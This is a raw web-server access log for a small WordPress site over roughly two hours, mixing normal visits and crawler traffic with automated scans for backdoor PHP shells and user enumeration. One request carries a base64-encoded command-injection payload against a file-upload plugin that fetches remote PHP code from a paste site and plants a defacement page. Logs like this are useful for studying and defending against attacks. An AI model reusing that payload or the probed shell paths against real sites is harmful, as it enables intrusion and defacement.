196.251.71.229 - - [30/Mar/2025:02:03:08 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 15299 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.71.229 - - [30/Mar/2025:02:03:08 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 15298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.71.229 - - [30/Mar/2025:02:03:08 -0400] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 404 15258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.71.229 - - [30/Mar/2025:02:03:12 -0400] "GET /emthpmko.php?Fox=d3wL7 HTTP/1.1" 404 15296 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.71.229 - - [30/Mar/2025:02:03:12 -0400] "POST /alfacgiapi/perl.alfa HTTP/1.1" 404 15244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
85.208.98.23 - - [30/Mar/2025:02:07:00 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.244.66.194 - - [30/Mar/2025:02:07:18 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:02:19:07 -0400] "POST /wp-cron.php?doing_wp_cron=1743315547.0172729492187500000000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
216.244.66.194 - - [30/Mar/2025:02:19:02 -0400] "GET /business-trip-massage/ HTTP/1.1" 200 21794 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
91.121.44.198 - - [30/Mar/2025:02:29:21 -0400] "GET /hvac-systems-and-mold/ HTTP/1.1" 200 24058 "http://creative-webstyle.com/hvac-systems-and-mold/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
198.54.114.83 - - [30/Mar/2025:02:29:29 -0400] "POST /wp-cron.php?doing_wp_cron=1743316169.6456480026245117187500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
91.121.44.198 - - [30/Mar/2025:02:29:24 -0400] "POST /wp-comments-post.php HTTP/1.1" 200 1166 "http://creative-webstyle.com/hvac-systems-and-mold/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
198.54.114.83 - - [30/Mar/2025:02:35:24 -0400] "POST /wp-cron.php?doing_wp_cron=1743316524.1400279998779296875000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
45.148.10.237 - - [30/Mar/2025:02:35:22 -0400] "GET /lzdmod/desktop-footer/6.1.1/pc/index.js HTTP/1.1" 404 15313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
146.70.194.252 - - [30/Mar/2025:02:40:05 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.252 - - [30/Mar/2025:02:40:06 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:02:40:10 -0400] "POST /wp-cron.php?doing_wp_cron=1743316810.5289540290832519531250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
146.70.194.252 - - [30/Mar/2025:02:40:07 -0400] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 15294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.252 - - [30/Mar/2025:02:40:12 -0400] "GET /?author=1 HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.252 - - [30/Mar/2025:02:40:13 -0400] "GET /?author=2 HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.252 - - [30/Mar/2025:02:40:14 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 2069 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.42.116.214 - - [30/Mar/2025:02:45:05 -0400] "GET / HTTP/1.1" 200 98430 "http://creative-webstyle.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
216.244.66.194 - - [30/Mar/2025:02:53:38 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
106.227.49.113 - - [30/Mar/2025:02:57:45 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.83 - - [30/Mar/2025:03:11:54 -0400] "POST /wp-cron.php?doing_wp_cron=1743318714.5925068855285644531250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
216.244.66.194 - - [30/Mar/2025:03:11:50 -0400] "GET /custom-vinyl-banners/ HTTP/1.1" 200 21763 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:03:19:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743319144.4163839817047119140625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
216.244.66.194 - - [30/Mar/2025:03:19:00 -0400] "GET /unlocking-the-secret-to-gorgeous-locks-the-hair-dryer-diffuser/feed/ HTTP/1.1" 200 473 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:03:35:01 -0400] "POST /wp-cron.php?doing_wp_cron=1743320100.7355918884277343750000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
139.99.68.31 - - [30/Mar/2025:03:34:57 -0400] "GET /wp-content/uploads/2017-------/09/wp-console.php HTTP/1.1" 404 15306 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:12 -0400] "GET /wp-includes/js/crop/uword.php HTTP/1.1" 404 15296 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:17 -0400] "GET /wp-content/themes/bltm/wp-login.php HTTP/1.1" 404 15297 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:20 -0400] "GET /autoload_classmap.php HTTP/1.1" 404 15290 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:24 -0400] "GET /wp-content/uploads/2014/07/olx.php HTTP/1.1" 404 15299 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:27 -0400] "GET /wp-admin/css/colors/midnight/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:30 -0400] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:31 -0400] "GET /wp-content/uploads/2020/wp-couldent.php.suspected HTTP/1.1" 404 15310 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:36 -0400] "GET /wp-content/plugins/523453244/ninja.php HTTP/1.1" 404 15304 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
198.54.114.83 - - [30/Mar/2025:03:35:46 -0400] "POST /wp-cron.php?doing_wp_cron=1743320144.1255769729614257812500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
139.99.68.31 - - [30/Mar/2025:03:35:43 -0400] "GET /wp-includes/js/imgareaselect/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:48 -0400] "GET /wp-includes/js/imgareaselect/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:49 -0400] "GET /wp-includes/PHPMailer/load.php HTTP/1.1" 404 15296 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:52 -0400] "GET /wp-links.php HTTP/1.1" 404 15284 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:56 -0400] "GET /wp-aa.php HTTP/1.1" 404 15281 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:35:59 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 404 15301 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:02 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 404 15298 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:05 -0400] "GET /about.php HTTP/1.1" 404 15283 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:07 -0400] "GET /xx.php HTTP/1.1" 404 15282 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:09 -0400] "GET /wp-content/themes/digital-download/new.php HTTP/1.1" 404 15305 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:12 -0400] "GET /epinyins.php HTTP/1.1" 404 15287 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:14 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 404 15287 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:18 -0400] "GET /dropdown.php HTTP/1.1" 404 15287 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:21 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:23 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:23 -0400] "GET /wp-content/mah.php HTTP/1.1" 404 15287 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:25 -0400] "GET /wp-content/item.php HTTP/1.1" 404 15287 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:28 -0400] "GET /wp-content/plugins/shell/about.php HTTP/1.1" 404 15298 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:29 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 15296 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:32 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 15297 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:42 -0400] "GET /wp-content/plugins/ph-file-manager/wp-file.php HTTP/1.1" 404 15305 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
198.54.114.83 - - [30/Mar/2025:03:36:45 -0400] "POST /wp-cron.php?doing_wp_cron=1743320205.1728019714355468750000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
139.99.68.31 - - [30/Mar/2025:03:36:44 -0400] "GET /wp-content/plugins/root-file-manager/wp-file.php HTTP/1.1" 404 15309 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:47 -0400] "GET /wp-content/plugins/wp-help/mini.php HTTP/1.1" 404 15300 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:49 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 404 15298 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
198.54.114.83 - - [30/Mar/2025:03:36:51 -0400] "POST /wp-cron.php?doing_wp_cron=1743320210.9875340461730957031250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
139.99.68.31 - - [30/Mar/2025:03:36:50 -0400] "GET /wp-content/themes/jaida/lang.php HTTP/1.1" 404 15298 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:54 -0400] "GET /wp-l0gin.php HTTP/1.1" 404 15283 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:56 -0400] "GET /ext.php HTTP/1.1" 404 15281 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:36:58 -0400] "GET /wp-l0gin.php HTTP/1.1" 404 15283 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
198.54.114.83 - - [30/Mar/2025:03:40:19 -0400] "POST /wp-cron.php?doing_wp_cron=1743320411.9299299716949462890625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
216.244.66.194 - - [30/Mar/2025:03:39:58 -0400] "GET /robots.txt HTTP/1.1" 200 132 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
45.148.10.237 - - [30/Mar/2025:03:40:24 -0400] "GET /lzdmod/site-nav-pc/5.2.38/assets/liveup/index.js HTTP/1.1" 404 15318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0"
196.251.88.242 - - [30/Mar/2025:03:44:42 -0400] "POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9 HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:03:44:53 -0400] "GET /wp-content/plugins/wp-file-upload/de.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:03:45:01 -0400] "GET /hk.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:03:46:28 -0400] "POST /wp-cron.php?doing_wp_cron=1743320788.5277299880981445312500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
196.251.69.226 - - [30/Mar/2025:03:46:24 -0400] "GET /thoms.php HTTP/1.1" 404 15284 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.147.125.23 - - [30/Mar/2025:03:51:05 -0400] "GET / HTTP/1.1" 200 98430 "http://creative-webstyle.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:04:00:55 -0400] "POST /wp-cron.php?doing_wp_cron=1743321654.9601640701293945312500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
196.251.88.242 - - [30/Mar/2025:04:00:48 -0400] "GET /geju.php HTTP/1.1" 404 15284 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:04:01:03 -0400] "GET /wp-content/plugins/about.php HTTP/1.1" 404 15293 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:04:01:15 -0400] "GET /wp.php HTTP/1.1" 404 15280 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:04:09:35 -0400] "POST /wp-cron.php?doing_wp_cron=1743322174.7124879360198974609375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
173.236.234.127 - - [30/Mar/2025:04:09:30 -0400] "GET /hvac-systems-and-mold/ HTTP/1.1" 200 24056 "http://creative-webstyle.com/hvac-systems-and-mold/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:04:09:48 -0400] "POST /wp-cron.php?doing_wp_cron=1743322186.9834139347076416015625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
173.236.234.127 - - [30/Mar/2025:04:09:46 -0400] "POST /wp-comments-post.php HTTP/1.1" 200 1168 "http://creative-webstyle.com/hvac-systems-and-mold/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:04:12:01 -0400] "POST /wp-cron.php?doing_wp_cron=1743322321.0394520759582519531250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
103.148.104.77 - - [30/Mar/2025:04:12:00 -0400] "GET /admin.php HTTP/1.1" 404 15283 "http://creative-webstyle.com/admin.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
196.251.88.242 - - [30/Mar/2025:04:18:25 -0400] "GET /geju.php HTTP/1.1" 404 15284 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:04:18:35 -0400] "GET /wp-content/plugins/about.php HTTP/1.1" 404 15293 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:04:18:42 -0400] "GET /wp.php HTTP/1.1" 404 15280 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:04:19:20 -0400] "GET /geju.php HTTP/1.1" 404 15284 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:04:19:33 -0400] "GET /wp-content/plugins/about.php HTTP/1.1" 404 15293 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:04:19:42 -0400] "GET /wp.php HTTP/1.1" 404 15280 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
45.156.129.127 - - [30/Mar/2025:04:21:11 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:04:21:18 -0400] "POST /wp-cron.php?doing_wp_cron=1743322878.0404999256134033203125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
45.156.129.127 - - [30/Mar/2025:04:21:13 -0400] "GET /aspera/faspex/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.126 - - [30/Mar/2025:04:21:20 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.127 - - [30/Mar/2025:04:21:43 -0400] "GET /license.txt HTTP/1.1" 200 8314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:04:21:57 -0400] "POST /wp-cron.php?doing_wp_cron=1743322916.9523019790649414062500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
45.156.129.127 - - [30/Mar/2025:04:21:56 -0400] "GET /wp-content/plugins/bbpress/readme.txt HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.127 - - [30/Mar/2025:04:21:58 -0400] "GET /wp-content/plugins/bbpress/readme.txt HTTP/1.1" 404 15304 "http://www.creative-webstyle.com/wp-content/plugins/bbpress/readme.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [30/Mar/2025:04:22:10 -0400] "GET /wp-content/plugins/optinmonster/readme.txt HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [30/Mar/2025:04:22:10 -0400] "GET /wp-content/plugins/optinmonster/readme.txt HTTP/1.1" 404 15308 "http://www.creative-webstyle.com/wp-content/plugins/optinmonster/readme.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.127 - - [30/Mar/2025:04:22:38 -0400] "GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
